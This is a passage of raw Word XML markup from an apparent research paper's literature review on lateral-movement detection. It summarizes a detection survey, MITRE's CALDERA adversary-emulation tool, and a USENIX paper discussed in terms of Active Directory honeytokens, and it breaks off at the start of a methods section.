    <w:p w14:paraId="18817DBC" w14:textId="35A149DE" w:rsidR="00B320CB" w:rsidRDefault="006C0977" w:rsidP="003C07CC">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The survey also delves into graph-based strategies, which offer unique approaches to visualizing and analyzing network </w:t>
      </w:r>
      <w:r w:rsidR="00FC1A9F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>behavior to identify suspicious lateral movement activities. Throughout the study, the authors pay special attention to the application of these detection methods in IoT environments, recognizing the unique challenges and opportunities presented by these increasingly prevalent devices</w:t>
      </w:r>
      <w:r w:rsidR="00853F62" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. While examining various methodologies</w:t>
      </w:r>
      <w:r w:rsidR="0012195E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, techniques, </w:t>
      </w:r>
      <w:r w:rsidR="0012195E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>benchmark datasets, and challenges across these categories, the survey provides a holistic view of the current state o</w:t>
      </w:r>
      <w:r w:rsidR="00EF64C4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="0012195E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> lateral movement detection research. The survey not only summarizes existing research but also identifies key trends, challenges, and potential areas for future </w:t>
      </w:r>
      <w:r w:rsidR="00EF64C4" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">investigation. By mapping the progress in this field over time and offering insightful observations, the authors aim to propel future research in lateral movement </w:t>
      </w:r>
      <w:r w:rsidR="005C07F8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>detection</w:t>
      </w:r>
      <w:r w:rsidR="000A06CB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> forward, contributing valuable knowledge to cybersecurity </w:t>
      </w:r>
      <w:r w:rsidR="00293BFC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>professionals</w:t>
      </w:r>
      <w:r w:rsidR="000A06CB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and researchers, such as us, working </w:t>
      </w:r>
      <w:r w:rsidR="00293BFC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="000A06CB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> combat these sophisticated attacks in increasingly complex network environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B654A" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="003C07CC">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8B3FFF" w14:textId="5C4B2151" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="002B7E55" w:rsidP="00ED0149">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CALDERA (Automat</w:t>
      </w:r>
      <w:r w:rsidR="00C62F6C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing Adversary Emulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB07ED" w14:textId="48C3508B" w:rsidR="009609A0" w:rsidRDefault="00B228E9" w:rsidP="003D1E81">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="002F5AAC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>he second</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> article</w:t>
      </w:r>
      <w:r w:rsidR="003D5BA9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, by </w:t>
      </w:r>
      <w:r w:rsidR="00133E9B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lead Cyber Security Engineer Andy Applebaum</w:t>
      </w:r>
      <w:r w:rsidR="004B7287" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Senior Cyber Security Engineer Doug Miller</w:t>
      </w:r>
      <w:r w:rsidR="003D131A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> thoroughly explains the importance and necessity of having tools like Caldera</w:t>
      </w:r>
      <w:r w:rsidR="000B71FE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidR="003D131A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which allow for Automated Adversarial Emulation</w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, a tool developed by MITRE for automating the process of adversary emulation in cybersecurity. The</w:t>
      </w:r>
      <w:r w:rsidR="005D2370" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> article</w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> begins by outlining the importance of understanding adversary tactics, techniques, and procedures (TTPs) for effective security posture management. Traditional methods of emulation are often manual, labor-intensive, and can miss nuances of real-world attacks. CALDERA aims to streamline this process, allowing security teams to simulate attacks in a controlled, scalable, and repeatable manner.</w:t>
      </w:r>
      <w:r w:rsidR="00843C76" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CALDERA's architecture is laid out, showcasing its modular design that separates the core functionalities from its various plugins. It supports a wide range of emulation scenarios, mapping to the MITRE ATT&amp;CK framework, which provides a common language for detailing cyber adversary activities. By using plugins, CALDERA can replicate the actions and behaviors of real attackers, facilitating testing and validation of defense mechanisms within an organization. The paper emphasizes the versatility of CALDERA, as it can be deployed in both red</w:t>
      </w:r>
      <w:r w:rsidR="00E30F45" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>team and blue</w:t>
      </w:r>
      <w:r w:rsidR="00E30F45" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>team exercises, improving collaboration and understanding between offensive and defensive security teams.</w:t>
      </w:r>
      <w:r w:rsidR="00843C76" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The document also delves into practical use cases of CALDERA, illustrating how it can be leveraged during penetration testing, incident response, and security assessments. It discusses the benefits of automating adversary emulation, including increased efficiency, deeper insight into defense weaknesses, and enhanced training opportunities for security </w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>personnel. The paper underscores the significance of continuous improvement in cybersecurity strategies through regular testing and adaptation to evolving threats, positioning CALDERA as a valuable asset in the modern cybersecurity landscape.</w:t>
      </w:r>
      <w:r w:rsidR="00843C76" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In conclusion,</w:t>
      </w:r>
      <w:r w:rsidR="00843C76" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="008B01DE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>article</w:t>
      </w:r>
      <w:r w:rsidR="003D1E81" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> serves as a comprehensive overview of the tool’s capabilities and applications in enhancing cybersecurity practices. It advocates for the integration of automated emulation into security workflows to better prepare organizations against potential adversaries by allowing teams to systematically identify and address vulnerabilities. The ongoing development and refinement of CALDERA highlight its role in the future of proactive cybersecurity measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2EF897" w14:textId="77777777" w:rsidR="00AB0891" w:rsidRPr="00FF6966" w:rsidRDefault="00AB0891" w:rsidP="003D1E81">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66739D0E" w14:textId="252D4063" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00C4016A" w:rsidP="00ED0149">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hopper: Modeling and Detecting Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D0763" w14:textId="2A4E26DD" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00F84F6D" w:rsidP="00AD399C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This article</w:t>
      </w:r>
      <w:r w:rsidR="00517BD8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by researchers from the USENIX conference includes contributions by Grant Ho, Mayank Dhiman, Devdatta Akhawe, Vern Paxson, Stefan Savage, Geoffrey M. Voelker, and David Wagner from UC Berkeley, UC San Diego, Figma, Inc., International Computer Science Institute, and Dropbox. The article was included in the Proceedings of the 30th USENIX Security Symposium on August 11-13, 2021. </w:t>
      </w:r>
      <w:r w:rsidR="00B61332" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, the paper explains </w:t>
      </w:r>
      <w:r w:rsidR="0049669C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">how Grant Ho and his aforementioned colleagues explore an </w:t>
      </w:r>
      <w:r w:rsidR="00D91616" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>innovative defensive strategy for cybersecurity using “honeytokens” within Microsoft Active Directory (AD) environments. Honeytokens</w:t>
      </w:r>
      <w:r w:rsidR="00AA462E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which</w:t>
      </w:r>
      <w:r w:rsidR="00D91616" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="00AA462E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a form of</w:t>
      </w:r>
      <w:r w:rsidR="00CE00AF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF06AC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00AA462E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Honeypot</w:t>
      </w:r>
      <w:r w:rsidR="00406EA7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-type’ defensive measure</w:t>
      </w:r>
      <w:r w:rsidR="00610953" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s deployed,</w:t>
      </w:r>
      <w:r w:rsidR="00AA462E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF292C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="00AF5B2F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blue teams to detect and disrupt </w:t>
      </w:r>
      <w:r w:rsidR="008958D3" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>critical phases during lateral movement attacks</w:t>
      </w:r>
      <w:r w:rsidR="002A2081" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00736437" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In this case, Lateral movement refers to an attacker’s progression through a network to gain access to additional resources or higher-</w:t>
      </w:r>
      <w:r w:rsidR="00DF292C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>privileged</w:t>
      </w:r>
      <w:r w:rsidR="00736437" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> accounts. Honeytokens are used as decoy objects</w:t>
      </w:r>
      <w:r w:rsidR="00DF292C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as fake user accounts, groups, or permissions, that mimic legitimate resources within the AD environment. When attackers attempt to interact with these decoys – either through reconnaissance or access attempts – they trigger alerts that notify defenders of potential malicious activity. This early detection capability is crucial in identifying and stopping attackers before they can escalate </w:t>
      </w:r>
      <w:r w:rsidR="00E30F45" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r w:rsidR="00DF292C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or access sensitive data.</w:t>
      </w:r>
      <w:r w:rsidR="00E30F45" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The article highlights that effective</w:t>
      </w:r>
      <w:r w:rsidR="00441F5E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> honeytoke</w:t>
      </w:r>
      <w:r w:rsidR="00DC03F7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="00441F5E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">placement requires understanding the typical paths attackers might take during lateral movement. By embedding </w:t>
      </w:r>
      <w:r w:rsidR="00CD294C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">honeytokens in high-value areas of the AD or in </w:t>
      </w:r>
      <w:r w:rsidR="00CD294C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">paths attackers are likely to traverse, defenders can maximize their chances of catching malicious activity. </w:t>
      </w:r>
      <w:r w:rsidR="00D52F20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, the authors emphasize the importance of ensuring honeytokens are indistinguishable from legitimate AD objects to avoid </w:t>
      </w:r>
      <w:r w:rsidR="00002EDC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>detection</w:t>
      </w:r>
      <w:r w:rsidR="00D52F20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by skilled attackers. This integration disrupts the attackers’ ability to confidently move laterally, increasing their cognitive load and forcing them to second-guess their actions. In this way, honeytokens not only serve as an early warning system but also actively interfere with the attackers’ lateral movement strategies, making the network environment more resilient to compromise. Moreover, the article </w:t>
      </w:r>
      <w:r w:rsidR="00002EDC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>outlines</w:t>
      </w:r>
      <w:r w:rsidR="00D52F20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD638D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidR="00D52F20" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> honeytokens create a layer of deception that complicates an attacker’s reconnaissance process </w:t>
      </w:r>
      <w:r w:rsidR="004F26E5" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>which is a prerequisite for lateral movement. By planting decoys that look like high-value targets</w:t>
      </w:r>
      <w:r w:rsidR="0083141B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or potential stepping stones, honeytokens blur the line between real and fake resources, making it difficult for attackers to identify actual assets. This misdirection can cause attackers to expend time and resources probing decoys instead of real targets, delaying their progress and increasing the likelihood of detection. For instance, a honeytoken could mimic an administrative account or a sensitive file, enticing the attacker to attempt access, which would then trigger logging and alerts. The authors also explore how automated deployment and monitoring of honeytokens can enhance their effectiveness in disrupting lateral movement. As such, Automation ensures honeytokens are continuously updated and </w:t>
      </w:r>
      <w:r w:rsidR="00CA7175" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>distributed throughout the AD environment</w:t>
      </w:r>
      <w:r w:rsidR="00AD570A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, maintaining their credibility and ensuring that they remain integral to the network’s defense strategy. Additionally, robust monitoring tools can detect when honeytokens are accessed, flagging potential breaches in real</w:t>
      </w:r>
      <w:r w:rsidR="00807C02" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD570A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>time and enabling defenders</w:t>
      </w:r>
      <w:r w:rsidR="005878F6" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to respond swiftly.</w:t>
      </w:r>
      <w:r w:rsidR="00B03787" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> By integrating honeytokens into a defense-in-depth overall strategy, the article demonstrates how organizations can create a hostile environment</w:t>
      </w:r>
      <w:r w:rsidR="00D53530" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for lateral movement. This integration ensures that attackers encounter obsta</w:t>
      </w:r>
      <w:r w:rsidR="00807C02" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00D53530" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>les at m</w:t>
      </w:r>
      <w:r w:rsidR="003624EB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ultiple stages of their operations, reducing their chances of successfully navigating the network. The use of honeytokens thus transforms lateral movement fro</w:t>
      </w:r>
      <w:r w:rsidR="004C31FE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="003624EB" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker’s advantage into a “liability”</w:t>
      </w:r>
      <w:r w:rsidR="001B0FA2" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, shifting the balance of power toward the defenders, or blue</w:t>
      </w:r>
      <w:r w:rsidR="006C5041" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B0FA2" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>team, and making it increasingly difficult</w:t>
      </w:r>
      <w:r w:rsidR="002B3EEA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for adversaries to achieve their goals undetected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F150FC" w14:textId="62B83F63" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00B662E5" w:rsidP="006B6B66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>research setup and proposed solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46A745" w14:textId="59D5BAC0" w:rsidR="00106968" w:rsidRDefault="00645DE5" w:rsidP="00106968">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the </w:t>
      </w:r>
      <w:r w:rsidR="00510B9B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>following s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
